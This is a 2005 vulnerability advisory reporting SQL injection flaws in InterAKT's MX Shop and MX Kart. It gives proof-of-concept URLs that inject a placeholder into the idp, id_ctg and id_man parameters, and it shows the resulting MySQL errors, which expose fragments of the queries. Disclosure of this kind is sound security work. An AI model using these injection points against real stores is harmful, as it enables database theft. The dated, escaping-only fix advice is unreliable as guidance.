-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: Medium Title: MX Shop 1.1.1 and MX Kart 1.1.2 are vulnerable to multiple SQL injection vulnerabilities Date: 1/04/2005 Vendor: InterAKT Vendor Website: http://www.interaktonline.com Summary: There are, mx shop 1.1.1 and mx kart 1.1.2 are vulnerable to multiple sql injection vulnerabilities. Proof of Concept Exploits: http://localhost/kartDemo/index.php?mod=pages&idp='SQL_INJECTION&PHPSE SSID=b1267b894a93572928850920df08126d SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION' at line 1 http://localhost/MXShop/?mod=category&id_ctg='SQL_INJECTION&PHPSESSID= b1267b894a93572928850920df08126d SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION OR id_prd=-1' at line 1 http://localhost/kartDemo/index.php?mod=category&id_ctg='SQL_INJECTION &PHPSESSID=b1267b894a93572928850920df08126d SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION OR id_prd=-1' at line 1 http://localhost/kartDemo/index.php?PHPSESSID=b1267b894a93572928850920 df08126d&id_man='SQL_INJECTION&mod=manufacturer SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION AND visible_prd=1 ORDER BY name_prd ASC LIMIT 0 Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems. Keep your self updated, Rss feed at: http://icis.digitalparadox.org/~dcrab/rss.php Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php. Diabolic Crab's Security Services: Contact at dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web application securing services, along with programming in php, vb, asp, c, c++, perl, java, html and graphic designing. For advertising on http://icis.digitalparadox.org/~dcrab or in these advisories contact dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkw/dCZV5e8av/DUEQJ6rwCgya93TPMAsMbCMsDilndeyEmo3b4An0Zh 9QcLcuXpLWwMf2lAHXg4JBN1 =1yV9 -----END PGP SIGNATURE-----